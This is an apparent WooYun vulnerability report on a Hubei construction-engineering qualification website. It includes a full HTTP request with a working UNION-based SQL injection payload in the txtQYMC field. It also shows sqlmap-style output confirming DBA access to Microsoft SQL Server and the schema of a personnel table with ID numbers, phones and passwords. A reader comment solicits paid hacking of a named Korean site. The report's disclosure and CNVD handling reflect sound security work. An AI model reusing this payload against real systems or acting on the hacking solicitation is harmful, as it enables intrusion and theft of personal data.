eWunOaYjOW4ggnlrZ3mhJ/luIIJ6YSC5bee5biCCeS7meahg+W4ggnojYbpl6jluIIJ5Y2B5aCw5biCCeWSuOWugeW4ggnlpKnpl6jluIIJ6buE5YaI5biCCemaj+W3nuW4ggnpu4Tnn7PluIIJ6I2G5bee5biCCeaBqeaWveW3ngnnnIHnm7TovpYM5Lit5aSu5Zyo6YSCFCsDFGdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAQ8QDxYGHwAFCE5BTUVDT0RFHwEFBE5BTUUfAmdkEBUPBuWFqOmDqB7ln47kuaHop4TliJLnvJbliLbljZXkvY3otYTotKge5bu66K6+5bel56iL5YuY5a+f5LyB5Lia6LWE6LSoHuW7uuiuvuW3peeoi+iuvuiuoeS8geS4mui1hOi0qCrlt6XnqIvlu7rorr7pobnnm67mi5vmoIfku6PnkIbmnLrmnoTotYTmoLwe5bel56iL6YCg5Lu35ZKo6K+i5LyB5Lia6LWE6LSoGOW3peeoi+ebkeeQhuS8geS4mui1hOi0qBblu7rnrZHkuJrkvIHkuJrotYTotKggLeW7uuiuvuW3peeoi+iuvuiuoeaWveW3peS4gOS9k+WMluS8geS4mui1hOi0qCflu7rnrZHmlr3lt6XkvIHkuJrlronlhajnlJ/kuqforrjlj6/or4Ek5bu66K6+5bel56iL6LSo6YeP5qOA5rWL5py65p6E6LWE6LSoG+aIv+WcsOS6p+W8gOWPkeS8geS4mui1hOi0qBvmiL/lnLDkuqfkvLDku7fmnLrmnoTotYTotKgY54mp5Lia5pyN5Yqh5LyB5Lia6LWE6LSoHuWfjuW4guWbreael+e7v+WMluS8geS4mui1hOi0qBUPAzEwMAMxMDEDMTAyAzEwMwMxMDQDMTA1AzEwNgMxMDcDMTA4AzEwOQMxMTADMTExAzExMgMxMTMDMTE0FCsDD2hoaGhoaGhoaGhnaGhoaBYBAgpkAgIPEGRkFgBkAgMPEGRkFgBkAgQPEGRkFgBkAgUPEGRkFgBkAgkPPCsADQEADxYGHgdWaXNpYmxlZx8CZx4LXyFJdGVtQ291bnQCCmQWAmYPZBYWAgEPZBYMZg9kFgICAQ8PFgIeBFRleHQFJDRiMGZjZTk0LTkwMjItNGMzYS04ZGM3LTY2NWI5N2RhNDZiNWRkAgEPZBYEZg8VASQ0YjBmY2U5NC05MDIyLTRjM2EtOGRjNy02NjViOTdkYTQ2YjVkAgEPDxYCHwUFMOatpuaxieWNmueQhuW7uuetkeW3peeoi+i0qOmHj+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMDEwMDAwMDM2NzY4N2RkAgMPZBYCAgEPDxYCHwUFBuadqOe5gWRkAgQPZBYCAgEPDxYCHwUFCjIwMTMtMTAtMThkZAIFD2QWAgIBDw8WAh8FBQnmrabmsYnluIJkZAICD2QWDGYPZBYCAgEPDxYCHwUFJDhiOGRmODJkLWQ0YTgtNDg2Ni04ODEyLTM2MjVlZmVhOWY5Y2RkAgEPZBYEZg8VASQ4YjhkZjgyZC1kNGE4LTQ4NjYtODgxMi0zNjI1ZWZlYTlmOWNkAgEPDxYCHwUFLeWuo+aBqeWOv+WQjOWNh+W7uuiuvuW3peeoi+i0qOmHj+ajgOa1i+S4reW/g2RkAgIPZBYCAgEPDxYCHwUFDzQyMjgyNTAwMDAwMTA5N2RkAgMPZBYCAgEPDxYCHwUFCeW7lueUn+WGm2RkAgQPZBYCAgEPDxYCHwUFCjIwMDYtMDYtMDFkZAIFD2QWAgIBDw8WAh8FBQbmganmlr1kZAIDD2QWDGYPZBYCAgEPDxYCHwUFJDk4ZDk2ZDU1LWVkNDUtNDc1Mi1hOGRiLWJkNzViMWUzMWU3NGRkAgEPZBYEZg8VASQ5OGQ5NmQ1NS1lZDQ1LTQ3NTItYThkYi1iZDc1YjFlMzFlNzRkAgEPDxYCHwUFLeS/neW6t+WOv+aZuuivmuW7uuiuvuW3peeoi+i0qOmHj+ajgOa1i+S4reW/g2RkAgIPZBYCAgEPDxYCHwVlZGQCAw9kFgICAQ8PFgIfBQUJ6buE5aSp5p2wZGQCBA9kFgICAQ8PFgIfBWVkZAIFD2QWAgIBDw8WAh8FBQbopYTpmLNkZAIED2QWDGYPZBYCAgEPDxYCHwUFJDFlNzcwOWU0LWVkODgtNDMxZC1hZjc0LTNkMTAxZGE0MzVlZWRkAgEPZBYEZg8VASQxZTc3MDllNC1lZDg4LTQzMWQtYWY3NC0zZDEwMWRhNDM1ZWVkAgEPDxYCHwUFKua5luWMl+avheaNt+W7uuiuvuW3peeoi+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwVlZGQCAw9kFgICAQ8PFgIfBQUG6YOR5p2wZGQCBA9kFgICAQ8PFgIfBWVkZAIFD2QWAgIBDw8WAh8FBQbmrabmsYlkZAIFD2QWDGYPZBYCAgEPDxYCHwUFJDNkMTQwMjFiLThiOTQtNDczMC1iZDA3LTk4ZWFiOGQ2MGJhOWRkAgEPZBYEZg8VASQzZDE0MDIxYi04Yjk0LTQ3MzAtYmQwNy05OGVhYjhkNjBiYTlkAgEPDxYCHwUFNuatpuaxieaZuua6kOW7uuetkeW3peeoi+i0qOmHj+ajgOa1i+aciemZkOi0o+S7u+WFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMDEwNzAwMDAzMzA4MmRkAgMPZBYCAgEPDxYCHwUFCeiUoeaZk+azomRkAgQPZBYCAgEPDxYCHwUFCjIwMDYtMDgtMTZkZAIFD2QWAgIBDw8WAh8FBQbmrabmsYlkZAIGD2QWDGYPZBYCAgEPDxYCHwUFJDlhMDI2ZWVjLTU3MmYtNGUzNC1iMjVlLTBhYTY4YzY4OTg5OGRkAgEPZBYEZg8VASQ5YTAyNmVlYy01NzJmLTRlMzQtYjI1ZS0wYWE2OGM2ODk4OThkAgEPDxYCHwUFKuiVsuaYpeWNjuebm+W7uuiuvuW3peeoi+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMTEyNjAwMDAyOTk5MmRkAgMPZBYCAgEPDxYCHwUFCeeOi+iDnOWIqWRkAgQPZBYCAgEPDxYCHwUFCjIwMDYtMDctMjVkZAIFD2QWAgIBDw8WAh8FBQbpu4TlhohkZAIHD2QWDGYPZBYCAgEPDxYCHwUFJDE1NmY0NDc1LTBhMjUtNDFmYi05NTI2LTQ5Yjc4ODgxZWQ1MmRkAgEPZBYEZg8VASQxNTZmNDQ3NS0wYTI1LTQxZmItOTUyNi00OWI3ODg4MWVkNTJkAgEPDxYCHwUFM+e9l+eUsOWOv+W5v+Wuh+W7uuiuvuW3peeoi+i0qOmHj+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMTEyMzAwMDAwOTI3NGRkAgMPZBYCAgEPDxYCHwUFBuaWuee6omRkAgQPZBYCAgEPDxYCHwUFCjIwMDktMDYtMDVkZAIFD2QWAgIBDw8WAh8FBQbpu4TlhohkZAIID2QWDGYPZBYCAgEPDxYCHwUFJGFkYzk1MWMwLTY1YTEtNDNiOS1hZjc5LTk0YThhNTliNWYwOWRkAgEPZBYEZg8VASRhZGM5NTFjMC02NWExLTQzYjktYWY3OS05NGE4YTU5YjVmMDlkAgEPDxYCHwUFMOilhOmYs+enkeWzsOW7uuiuvuW3peeoi+i0qOmHj+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMDYwMDAwMDIxODExMWRkAgMPZBYCAgEPDxYCHwUFCeWNleW7tuW7tmRkAgQPZBYCAgEPDxYCHwUFCjIwMDMtMDktMjZkZAIFD2QWAgIBDw8WAh8FBQbopYTpmLNkZAIJD2QWDGYPZBYCAgEPDxYCHwUFJDc0MTgyMDIxLTgzMDItNDcyMi05MjRjLWQ3ZDZjYzJmYzU1MWRkAgEPZBYEZg8VASQ3NDE4MjAyMS04MzAyLTQ3MjItOTI0Yy1kN2Q2Y2MyZmM1NTFkAgEPDxYCHwUFM+a5luWMl+ecgeW7uuetkeW3peeoi+i0qOmHj+ebkeedo+ajgOmqjOa1i+ivleS4reW/g2RkAgIPZBYCAgEPDxYCHwVlZGQCAw9kFgICAQ8PFgIfBQUG6aW26ZKiZGQCBA9kFgICAQ8PFgIfBWVkZAIFD2QWAgIBDw8WAh8FBQbnnIHnm7RkZAIKD2QWDGYPZBYCAgEPDxYCHwUFJDg4OGJhNjA1LWY2MmUtNGM5NS04N2I5LTkxZjA4OGE5ODBhZmRkAgEPZBYEZg8VASQ4ODhiYTYwNS1mNjJlLTRjOTUtODdiOS05MWYwODhhOTgwYWZkAgEPDxYCHwUFLeiNhuW3nuW4guWNmuWuh+W7uuiuvuW3peeoi+ajgOa1i+aciemZkOWFrOWPuGRkAgIPZBYCAgEPDxYCHwUFDzQyMTAwMDAwMDA4NDA1M2RkAgMPZBYCAgEPDxYCHwUFCeWHjOS6keW/l2RkAgQPZBYCAgEPDxYCHwUFCjIwMDYtMDgtMjlkZAIFD2QWAgIBDw8WAh8FBQbojYblt55kZAILDw8WAh8DaGRkAgoPDxYCHgtSZWNvcmRjb3VudAIKZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDGltZ2J1dFNlYXJjaAUGZ3ZxeXp6DzwrAAoBCAIBZA/k/IZBcJEeqwDIfQorS8EbrYx8&__EVENTVALIDATION=/wEWKAKuwI7wBgLc7+aFDgLO+aTNCQKA9szMCQLotZ6fCQK686LZAgLA2Ji/CgKH3symCgKqxc/ACAKDt//tCQLuqaaCDQLrycjvCAKswoSTCAKz1aiCDQLo1qejCQLVxs/ACALo1ruyCwLuqc7ACAKfo+z6CwLvh7iWAwLhp+GSBwKUosHTAwLs0fnfDAKB6N+qAgKa/72BCAK/lpKcDgLQrPDqAwL1w9bBCQKO2rTcDwKj8aqrBQKUm+r1DQKpssjAAwLs0f3fDAKB6NOqAgKa/7GBCAK/lpacDgLQrPTqAwLF//TlBwLCsInJAwKU9djxCrhj2q0/uwu2S8OOpc6ZyKAH8Syi&RBUTCity=%E5%85%A8%E7%9C%81&RBUTzzlb=110&txtQYMC=%E5%BB%BA%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(82)+CHAR(69)+CHAR(88)+CHAR(113)+CHAR(116)+CHAR(101)+CHAR(109)+CHAR(97)+CHAR(80)+CHAR(121)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imgbutSearch.x=47&imgbutSearch.y=6
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database:    'JSHYBDB'
current user is DBA:    True


总共有34个数据库:

wybhjst1.png


有大量的人员相关的数据:

wyhbjst4.png


wyhbjst5.png


wyhbjs2.png


wyhbjs3.png


wyhbjst6.png


Database: jianzaoshi
Table: jzsinfo
[76 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| beginhetong     | datetime |
| birth           | datetime |
| cbzhuangtai     | nvarchar |
| cfbs            | nvarchar |
| chufa           | nvarchar |
| companyname     | nvarchar |
| CXdspici        | nvarchar |
| CXdsscr         | nvarchar |
| CXdsyj          | nvarchar |
| CXsjscr         | nvarchar |
| CXsjyj          | nvarchar |
| CXyy            | nvarchar |
| CXZCzt          | nvarchar |
| CXzt            | nvarchar |
| czkg            | nvarchar |
| dspici          | nvarchar |
| dsshencharen    | nvarchar |
| email           | nvarchar |
| endhetong       | datetime |
| fuzeren         | nvarchar |
| ggpici          | nvarchar |
| graduatfrom     | nvarchar |
| graduattime     | datetime |
| icname          | nvarchar |
| icnumber        | nvarchar |
| jzsid           | int      |
| jzsleixing      | nvarchar |
| minzu           | nvarchar |
| mobeltel        | nvarchar |
| name            | nvarchar |
| password        | nvarchar |
| piciliushui     | int      |
| professional    | nvarchar |
| qfdate          | datetime |
| qianzitime      | datetime |
| ruzerentime     | nvarchar |
| RYZT            | varchar  |
| SBcity          | varchar  |
| sex             | nvarchar |
| shenpizhuangtai | nvarchar |
| sjpici          | nvarchar |
| sjshencharen    | nvarchar |
| sjyj            | nvarchar |
| sppc            | int      |
| sppici          | int      |
| ssbs            | varchar  |
| telphone        | nvarchar |
| username        | nvarchar |
| xiugaizhuangtai | nvarchar |
| xueli           | nvarchar |
| xuewei          | nvarchar |
| YSdspici        | nvarchar |
| YSdsscr         | nvarchar |
| YSdsyj          | nvarchar |
| YSnr            | nvarchar |
| YSsjscr         | nvarchar |
| YSsjyj          | nvarchar |
| YSyy            | nvarchar |
| YSzt            | nvarchar |
| ywleixing       | nvarchar |
| yxdate          | datetime |
| zgsc            | nvarchar |
| zgzsbhdy        | int      |
| zgzsbhnum       | int      |
| zgzszsbh        | int      |
| zhengshu1bh     | nvarchar |
| zhengshu2bh     | nvarchar |
| zhengshu3bh     | nvarchar |
| zhengshu4bh     | nvarchar |
| zhengshu5bh     | nvarchar |
| zhengshubianhao | nvarchar |
| zhengshujibei   | nvarchar |
| ZJLXDM          | varchar  |
| ZXHyy           | varchar  |
| ZXzt            | varchar  |
| zyyzjym         | varchar  |
+-----------------+----------+


wyhbj.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-31 14:09

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给湖北X分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-28 13:06 | Mr.Wang ( 路人 | 还没有发布任何漏洞 | 黑与白的对立中,寻求突破。)

    哪位大牛帮我检测下korea的 www.programbay.co.kr 挂korea的ip 登陆 已屏蔽大陆ip 不白做 q:2573465610